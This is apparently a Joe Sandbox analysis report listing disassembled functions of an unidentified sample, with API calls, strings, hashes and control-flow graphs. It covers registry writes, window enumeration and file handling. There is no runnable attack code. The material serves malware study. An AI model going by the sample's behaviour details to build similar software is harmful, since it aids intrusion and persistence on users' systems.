                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: G-v
                                                                                                                                        • API String ID: 0-332975281
                                                                                                                                        • Opcode ID: fcf46757807164fd0b036c92c22791238c095064063f76718f9c3f8fcc45eb22
                                                                                                                                        • Instruction ID: 8701134da6ec1f892dd90c7c28f7f3f10c11b52867b9683584bcbab48aabce20
                                                                                                                                        • Opcode Fuzzy Hash: fcf46757807164fd0b036c92c22791238c095064063f76718f9c3f8fcc45eb22
                                                                                                                                        • Instruction Fuzzy Hash: 95228C74E10209CFDB24DF58C494AAAB7F0FF09300F14806AEC5A9B391E779AD85CB91
                                                                                                                                        Function 0077DD92 Relevance: 4.5, APIs: 3, Instructions: 26fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesW.KERNEL32(0076C848,0076C848), ref: 0077DDA2
                                                                                                                                        • FindFirstFileW.KERNEL32(0076C848,?), ref: 007D4A83
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$AttributesFindFirst
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4185537391-0
                                                                                                                                        • Opcode ID: 46889cc0c83f57e1caebd730e5bc6474cf91e3ab8cbfdbe6808866ae9f82a9b6
                                                                                                                                        • Instruction ID: 2914bef8efd193a4bd1205710184fd50797270a8b8dd9fdb2cbbbe3beaf4e159
                                                                                                                                        • Opcode Fuzzy Hash: 46889cc0c83f57e1caebd730e5bc6474cf91e3ab8cbfdbe6808866ae9f82a9b6
                                                                                                                                        • Instruction Fuzzy Hash: 1CE0D8314154456B86346738DC4D8E9376C9F4A338B108706F975C11E0E778AD5485EA
                                                                                                                                        Function 00773680 Relevance: 2.5, APIs: 1, Instructions: 986COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharUpper
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3964851224-0
                                                                                                                                        • Opcode ID: 28fe689de511ee0c4180bdf90769f41f24709428bd54ac1249f691698e9ef278
                                                                                                                                        • Instruction ID: ec412dde7e413a76c3a8647753bcdc7089cdaed9b482410af2d219231dece2e6
                                                                                                                                        • Opcode Fuzzy Hash: 28fe689de511ee0c4180bdf90769f41f24709428bd54ac1249f691698e9ef278
                                                                                                                                        • Instruction Fuzzy Hash: 21926770608241DFDB24DF18C484B6AB7F0BF88344F14895DE98A8B3A2D779ED45DB92
                                                                                                                                        Function 007DC146 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: NameUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2645101109-0
                                                                                                                                        • Opcode ID: 32446fc50081df4c7bb6d88f945af441ef56b0f986d11a3df843560aa88bd01d
                                                                                                                                        • Instruction ID: 182f28a2ccd2af5e7ff76d7e0635045100805de5ff345efb0018a8dbb3ed00ac
                                                                                                                                        • Opcode Fuzzy Hash: 32446fc50081df4c7bb6d88f945af441ef56b0f986d11a3df843560aa88bd01d
                                                                                                                                        • Instruction Fuzzy Hash: BBC04CB140501DDFC755CB80C9859EFB7BCBB08300F148096A115E1100D7759F459B76
                                                                                                                                        Function 0076E1F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 815windowsleeptimeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0076E279
                                                                                                                                        • timeGetTime.WINMM ref: 0076E51A
                                                                                                                                        • TranslateMessage.USER32(?), ref: 0076E646
                                                                                                                                        • DispatchMessageW.USER32(?), ref: 0076E651
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0076E664
                                                                                                                                        • LockWindowUpdate.USER32(00000000), ref: 0076E697
                                                                                                                                        • DestroyWindow.USER32 ref: 0076E6A3
                                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0076E6BD
                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 007D5B15
                                                                                                                                        • TranslateMessage.USER32(?), ref: 007D62AF
                                                                                                                                        • DispatchMessageW.USER32(?), ref: 007D62BD
                                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007D62D1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                                        • API String ID: 2641332412-570651680
                                                                                                                                        • Opcode ID: 3a67d8777b4e3fde91e832e405d57fd795b897cbc15337c0a0ff1611cdcbb910
                                                                                                                                        • Instruction ID: f2e7244771e27098f4b01097e95f5521518d275e39d79be3ec562ae885e55c05
                                                                                                                                        • Opcode Fuzzy Hash: 3a67d8777b4e3fde91e832e405d57fd795b897cbc15337c0a0ff1611cdcbb910
                                                                                                                                        • Instruction Fuzzy Hash: A362C270504380DFDB24DF24C899BAA77E5BF44304F14896EFD4A8B292DB79D844CB62
                                                                                                                                        Function 00796A28 Relevance: 49.6, APIs: 26, Strings: 2, Instructions: 626fileCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ___createFile.LIBCMT ref: 00796C73
                                                                                                                                        • ___createFile.LIBCMT ref: 00796CB4
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00796CDD
                                                                                                                                        • __dosmaperr.LIBCMT ref: 00796CE4
                                                                                                                                        • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00796CF7
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00796D1A
                                                                                                                                        • __dosmaperr.LIBCMT ref: 00796D23
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00796D2C
                                                                                                                                        • __set_osfhnd.LIBCMT ref: 00796D5C
                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00796DC6
                                                                                                                                        • __close_nolock.LIBCMT ref: 00796DEC
                                                                                                                                        • __chsize_nolock.LIBCMT ref: 00796E1C
                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00796E2E
                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00796F26
                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00796F3B
                                                                                                                                        • __close_nolock.LIBCMT ref: 00796F9B
                                                                                                                                          • Part of subcall function 0078F84C: CloseHandle.KERNEL32(00000000,0080EEC4,00000000,?,00796DF1,0080EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0078F89C
                                                                                                                                          • Part of subcall function 0078F84C: GetLastError.KERNEL32(?,00796DF1,0080EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0078F8A6
                                                                                                                                          • Part of subcall function 0078F84C: __free_osfhnd.LIBCMT ref: 0078F8B3
                                                                                                                                          • Part of subcall function 0078F84C: __dosmaperr.LIBCMT ref: 0078F8D5
                                                                                                                                          • Part of subcall function 0078889E: __getptd_noexit.LIBCMT ref: 0078889E
                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00796FBD
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 007970F2
                                                                                                                                        • ___createFile.LIBCMT ref: 00797111
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0079711E
                                                                                                                                        • __dosmaperr.LIBCMT ref: 00797125
                                                                                                                                        • __free_osfhnd.LIBCMT ref: 00797145
                                                                                                                                        • __invoke_watson.LIBCMT ref: 00797173
                                                                                                                                        • __wsopen_helper.LIBCMT ref: 0079718D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                                        • String ID: 9Ax$@
                                                                                                                                        • API String ID: 3896587723-2490207084
                                                                                                                                        • Opcode ID: 08989e461d9380859dafbb9486d2e8adf6b926cef98e6029e40f54b1e717b055
                                                                                                                                        • Instruction ID: 23e78a396976c8d4ffaeb3be9a40d309e89b2bec4be84094a3b8d3ba461ee902
                                                                                                                                        • Opcode Fuzzy Hash: 08989e461d9380859dafbb9486d2e8adf6b926cef98e6029e40f54b1e717b055
                                                                                                                                        • Instruction Fuzzy Hash: AB222471A142059FEF299F68EC95BBE7B61FB00320F248329E521AB2D2D73D8D50DB51
                                                                                                                                        Function 007A76DB Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 007A76ED
                                                                                                                                        • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 007A7713
                                                                                                                                        • _wcscpy.LIBCMT ref: 007A7741
                                                                                                                                        • _wcscmp.LIBCMT ref: 007A774C
                                                                                                                                        • _wcscat.LIBCMT ref: 007A7762
                                                                                                                                        • _wcsstr.LIBCMT ref: 007A776D
                                                                                                                                        • 74D31560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 007A7789
                                                                                                                                        • _wcscat.LIBCMT ref: 007A77D2
                                                                                                                                        • _wcscat.LIBCMT ref: 007A77D9
                                                                                                                                        • _wcsncpy.LIBCMT ref: 007A7804
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscat$FileInfoVersion$D31560Size_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                        • API String ID: 1021613404-1459072770
                                                                                                                                        • Opcode ID: 9435c7725d6f5425229b18f75b8023e3f13b11c519fa215952cd0a383c4e8f4a
                                                                                                                                        • Instruction ID: 58aaa55d7e36e9d8a250b2d547309ae4d6b1763c6823cc412e7320c584ef66a1
                                                                                                                                        • Opcode Fuzzy Hash: 9435c7725d6f5425229b18f75b8023e3f13b11c519fa215952cd0a383c4e8f4a
                                                                                                                                        • Instruction Fuzzy Hash: 5E41C2B2A44204FEE705B7648C4FEBF77ACEF56720F100165F905E6192EB6CAA41C7A1
                                                                                                                                        Function 00761F04 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 608 761f04-761f9c call 762d1a * 2 call 76c935 * 2 call 767e53 call 76d3d2 * 3 625 7d2569-7d2575 call 782626 608->625 626 761fa2-761fa6 608->626 628 7d257d-7d2583 call 79e4ea 625->628 626->628 629 761fac-761faf 626->629 631 7d258f-7d259b call 76a4f6 628->631 629->631 632 761fb5-761fb8 629->632 640 7d2899-7d289d 631->640 641 7d25a1-7d25b1 call 76a4f6 631->641 632->631 634 761fbe-761fc7 GetForegroundWindow call 76200a 632->634 639 761fcc-761fe3 call 76197e 634->639 651 761fe4-762007 call 765cd3 * 3 639->651 643 7d289f-7d28a6 call 76c935 640->643 644 7d28ab-7d28ae 640->644 641->640 654 7d25b7-7d25c5 641->654 643->644 648 7d28b7-7d28c4 644->648 649 7d28b0 644->649 652 7d28d6-7d28da 648->652 653 7d28c6-7d28d4 call 76b8a7 CharUpperBuffW 648->653 649->648 657 7d28dc-7d28df 652->657 658 7d28f1-7d28fa 652->658 653->652 656 7d25c9-7d25e1 call 79d68d 654->656 656->640 670 7d25e7-7d25f7 call 77f885 656->670 657->658 662 7d28e1-7d28ef call 76b8a7 CharUpperBuffW 657->662 663 7d28fc-7d2909 GetDesktopWindow EnumChildWindows 658->663 664 7d290b EnumWindows 658->664 662->658 668 7d2911-7d2930 call 79e44e call 762d1a 663->668 664->668 685 7d2940 668->685 686 7d2932-7d293b call 76200a 668->686 680 7d25fd-7d260d call 77f885 670->680 681 7d287b-7d288b call 77f885 670->681 692 7d2861-7d2871 call 77f885 680->692 693 7d2613-7d2623 call 77f885 680->693 690 7d288d-7d2891 681->690 691 7d2873-7d2876 681->691 686->685 690->651 695 7d2897 690->695 692->691 700 7d2842-7d2848 GetForegroundWindow 692->700 701 7d281d-7d2836 call 7a88a2 IsWindow 693->701 702 7d2629-7d2639 call 77f885 693->702 698 7d2852-7d2858 695->698 698->692 704 7d2849-7d2850 call 76200a 700->704 701->651 709 7d283c-7d2840 701->709 711 7d2659-7d2669 call 77f885 702->711 712 7d263b-7d2640 702->712 704->698 709->704 720 7d266b-7d2675 711->720 721 7d267a-7d268a call 77f885 711->721 713 7d280d-7d280f 712->713 714 7d2646-7d2657 call 765cf6 712->714 717 7d2817-7d2818 713->717 722 7d269b-7d26a7 call 765be9 714->722 717->651 723 7d27e6-7d27f0 call 76c935 720->723 728 7d268c-7d2698 call 765cf6 721->728 729 7d26b5-7d26c5 call 77f885 721->729 732 7d26ad-7d26b0 722->732 733 7d2811-7d2813 722->733 736 7d2804-7d2808 723->736 728->722 739 7d26c7-7d26de call 782241 729->739 740 7d26e3-7d26f3 call 77f885 729->740 732->736 733->717 736->656 739->736 745 7d26f5-7d270c call 782241 740->745 746 7d2711-7d2721 call 77f885 740->746 745->736 751 7d273f-7d274f call 77f885 746->751 752 7d2723-7d273a call 782241 746->752 757 7d276d-7d277d call 77f885 751->757 758 7d2751-7d2768 call 782241 751->758 752->736 763 7d277f-7d2793 call 782241 757->763 764 7d2795-7d27a5 call 77f885 757->764 758->736 763->736 769 7d27a7-7d27b7 call 77f885 764->769 770 7d27c3-7d27d3 call 77f885 764->770 769->691 775 7d27bd-7d27c1 769->775 776 7d27d5-7d27da 770->776 777 7d27f2-7d2802 call 79d614 770->777 775->736 778 7d27dc-7d27e2 776->778 779 7d2815 776->779 777->691 777->736 778->723 779->717
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00767E53: _memmove.LIBCMT ref: 00767EB9
                                                                                                                                        • GetForegroundWindow.USER32 ref: 00761FBE
                                                                                                                                        • IsWindow.USER32(?), ref: 007D282E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Foreground_memmove
                                                                                                                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                        • API String ID: 3828923867-1919597938
                                                                                                                                        • Opcode ID: effd5a120e488053982bd112d112e21385c1995f61338cfdb0f6b11cdc2d0c2a
                                                                                                                                        • Instruction ID: 4946c210fc10784bd2f2a543dbaa230ce6c8a2cf7a71c4af99300c4dfbcf3a1d
                                                                                                                                        • Opcode Fuzzy Hash: effd5a120e488053982bd112d112e21385c1995f61338cfdb0f6b11cdc2d0c2a
                                                                                                                                        • Instruction Fuzzy Hash: 41D10A30104702DBCB14EF10C484AA9BBB1FF64350F148A2EF456576A3DB38E99BDB92
                                                                                                                                        Function 007C352A Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 782 7c352a-7c3569 call 76d3d2 * 3 789 7c356b-7c356e 782->789 790 7c3574-7c35e7 call 7684a6 call 7c3d7b call 7c3af7 782->790 789->790 791 7c35f9-7c360d call 772570 789->791 804 7c35e9-7c35f4 call 7ad7e4 790->804 805 7c3612-7c3617 790->805 797 7c3a94-7c3ab7 call 765cd3 * 3 791->797 804->791 806 7c366d 805->806 807 7c3619-7c362e RegConnectRegistryW 805->807 812 7c3671-7c369c RegCreateKeyExW 806->812 810 7c3667-7c366b 807->810 811 7c3630-7c3662 call 767ba9 call 7ad7e4 call 772570 807->811 810->812 811->797 815 7c369e-7c36d2 call 767ba9 call 7ad7e4 call 772570 812->815 816 7c36e7-7c36ec 812->816 815->797 838 7c36d8-7c36e2 RegCloseKey 815->838 819 7c3a7b-7c3a8c RegCloseKey 816->819 820 7c36f2-7c3715 call 7684a6 call 781bc7 816->820 819->797 823 7c3a8e-7c3a92 RegCloseKey 819->823 836 7c3796-7c37b6 call 7684a6 call 781bc7 820->836 837 7c3717-7c376d call 7684a6 call 7818fb call 7684a6 * 2 RegSetValueExW 820->837 823->797 848 7c37bc-7c3814 call 7684a6 call 7818fb call 7684a6 * 2 RegSetValueExW 836->848 849 7c3840-7c3860 call 7684a6 call 781bc7 836->849 837->819 861 7c3773-7c3791 call 767ba9 call 772570 837->861 838->797 848->819 879 7c381a-7c383b call 767ba9 call 772570 848->879 862 7c3949-7c3969 call 7684a6 call 781bc7 849->862 863 7c3866-7c38c9 call 7684a6 call 78010a call 7684a6 call 763b1e 849->863 880 7c3a74 861->880 884 7c396b-7c398b call 76cdb4 call 7684a6 862->884 885 7c39c6-7c39e6 call 7684a6 call 781bc7 862->885 899 7c38e9-7c3918 call 7684a6 RegSetValueExW 863->899 900 7c38cb-7c38d0 863->900 879->819 880->819 903 7c398d-7c39a1 RegSetValueExW 884->903 906 7c39e8-7c3a0e call 76d00b call 7684a6 885->906 907 7c3a13-7c3a30 call 7684a6 call 781bc7 885->907 914 7c393d-7c3944 call 78017e 899->914 915 7c391a-7c3936 call 767ba9 call 772570 899->915 904 7c38d8-7c38db 900->904 905 7c38d2-7c38d4 900->905 903->819 910 7c39a7-7c39c1 call 767ba9 call 772570 903->910 904->900 912 7c38dd-7c38df 904->912 905->904 906->903 931 7c3a67-7c3a71 call 772570 907->931 932 7c3a32-7c3a60 call 7abe47 call 7684a6 call 7abe8a 907->932 910->880 912->899 918 7c38e1-7c38e5 912->918 914->819 915->914 918->899 931->880 932->931
                                                                                                                                        APIs
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007C3626
                                                                                                                                        • RegCreateKeyExW.KERNEL32(?,?,00000000,007FDBF0,00000000,?,00000000,?,?), ref: 007C3694
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007C36DC
                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 007C3765
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 007C3A85
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 007C3A92
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                        • API String ID: 536824911-966354055
                                                                                                                                        • Opcode ID: 6a5eca2fc92efd3c2886dbc0346729bbe2d40db420cd0431df192431ad5f5c32
                                                                                                                                        • Instruction ID: 1b02f36bd4bd400c9bd06a83bd90c9ec6c41413be03226f7a578468725e59387
